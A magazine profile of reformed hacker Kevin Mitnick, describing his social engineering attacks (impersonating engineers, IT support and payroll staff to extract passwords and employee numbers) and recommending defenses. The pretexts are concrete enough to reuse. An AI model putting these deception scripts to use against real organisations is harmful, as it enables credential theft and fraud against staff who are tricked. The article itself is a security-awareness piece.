|
|||||||||
When famed hacker Kevin Mitnick wanted to break into the systems that run telecom operator Sprint’s backbone network, he did not bother running a sophisticated technical attack. Instead, his first move was to pick up the phone and simply ring the company direct.
Posing as a Nortel service engineer, Mitnick persuaded Sprint staff to hand over dial-in numbers, log-in names and passwords to the telephone company’s switches so that the
|
||
‘Nortel engineer’ he was posing as could perform routine remote maintenance on the equipment. Armed with that information, Mitnick says that he was able to dial-into Sprint’s network and manipulate phone lines at will.
“A lot of people think they are not gullible, that they can’t be manipulated. But nothing could be further from the truth,” says Mitnick. “I used such tactics to get information and compromise computer systems and networks.” That is something of an understatement.
Mitnick earned notoriety in the 1980s and 1990s for seemingly being able to break into telephone and computer systems across the world at will. He stole software from Santa Cruz Operation, Digital Equipment and Sun Microsystems, including an in-development source code copy of its Solaris operating system. He accessed the North American Defense Command (NORAD) computer systems and broke his way into the Pentagon. Arrested six times, his final capture resulted in a five-year jail term – the heaviest sentence ever handed down for a hacker.
Now since his release in January 2001, Mitnick, 38, has ‘gone straight’ as a security consultant specialising in ‘social engineering’ techniques – a hacking approach that many organisations have failed to appreciate. As such, he is in a position to deliver some valuable lessons on how many hackers really penetrate systems.
Social engineering
The Sprint hack was just one of many perpetrated by Mitnick using a combination of technical skills and ‘social engineering’ – the art of manipulating people into divulging information about their systems that can provide the pass-key for an attack.
For hackers, private investigators and industrial spies, the technique is compelling. Why go through the tedious process of ‘war-dialling’ for an insecure port on an organisation’s network or try to brute force a password – activities that might arouse suspicion – when through a mix of technical knowledge confidence trick an employees can often simply be persuaded to disclose a legitimate log-in name and password?
It is a skill that exploits innate psychological principles, says Mitnick. “All of us make mental shortcuts depending on who we think is making the request and the reason for the request. We don’t really analyse the identity of the person and whether they are authorised,” he says.
Exploiting fear of authority is a common tactic: Attackers will frequently pretend that they are acting on behalf of the boss and the target will feel that they have to comply – particularly as many executives demand that short-cuts be made for them when they want something done.
Reciprocity is also effective. “You call somebody up under the guise of helping them, help them with something regardless of whether they want the help or not, then the victim feels obligated to reciprocate,” says Mitnick.
To do this, a social engineer might cause a fault, such as persuading somebody in the IT department to shut down the port that connects his target employee’s PC to the Internet.
|
||
When he calls the target posing as someone from IT support just minutes later, the attacker can gain trust by ‘helping’ to restore the connection.
He might also pick up the target’s user name and password in the process. “‘We are having problems with the system, can you try changing your password to ‘test123′? Can you change it back?’ As soon as the attacker knows the password for a split second, he is in,” says Mitnick.
Alternatively, an attacker might call a relatively IT literate member of staff who will be bowled over at being asked to help the IT department. But when they are persuaded to try logging into a system via a certain Internet protocol (IP) address, for example, they may not be smart enough to realise that they are opening a port on a machine outside the organisation’s network, a port that is controlled by the attacker.
Obviously, the log in attempt fails, but the attacker gets what he wanted: The user name and password of the target, which he can use to break into the organisation’s systems. The target, meanwhile, does not realise that he has been manipulated into giving away such critical information.
Sting
Such examples are not made-up. They illustrate real attacks made by Mitnick or associates when he was a hacker or private investigator. Today, he makes his living as a security consultant, warning organisations of the dangers of people like him – and worse.
A typical attack may have two stages: The first is to gain information to use in the second stage, when the sting is carried out. In the first stage, acting stupid is enough to glean all the information that an attacker needs. ‘Hi, this is Tony in payroll. We just put through your request to have your pay cheque directly deposited to you Citibank account’.
At the other end of the phone, the target protests that no such request was ever made and besides, he does not even have a Citibank account. To check, ‘Tony in Payroll’ asks for his employee number, before confirming that he has indeed, made a mistake.
But while the target considers his payroll number to be innocuous, the attacker can use it to authenticate himself to the systems administrator who sets up dial-in accounts for remote workers, such as sales people in the field.
“I understand this exact ruse was worked on one of the largest computer software manufacturers in the world,” says Mitnick. “You would think the systems administrators in such a company would be trained to detect such an attack,” he adds.
“I think the threat of social engineering is substantial. People ought to know that you can buy the best technology in the world and it won’t protect the organisation against social engineering,” says Mitnick.
The reformed hacker says that companies must adopt a strategy to tighten up this neglected area of security. First, this should include training to alert staff at all levels of the threat posed by social engineers. For example, staff at telecoms companies often take calls from private investigators seeking information about people with ex-directory numbers.
Mitnick, of course, found an easier way. “I even social engineered BT. I used to get ex-directory numbers because I found out that an employee could access [the relevant] computer and all they needed was their sign-in code. So I talked an employee into divulging their sign-in code,” says Mitnick.
In addition, IT directors need to take a second look at some of the software they run and re-write it so that certain security policies are enforced. For example, forcing employees to choose more complex passwords or making sure that these are changed on a more regular basis.
Finally, organisations need also be more careful about what they throw out, shredding anything that an outsider could use to authenticate themselves as a valid employee in a social engineering-based attack.
“A social engineer needs to understand the corporate culture, the corporate structure, the organisational chart, who has access to what information, where in the company that information resides,” says Mitnick.
And much of that information can be found by ‘dumpster diving’ in the company waste bins, and fishing out discarded floppy disks, old company manuals, memos, phone lists, directories and even password lists, says Mitnick.
Are most companies so foolish as to make such sensitive information so easily accessible? Absolutely, Mitnick concludes.
assets assets.zip bin source summary_source tmp Information Age will be reviewing Kevin Mitnick’s new book The Art of Deception in the October 2002 issue.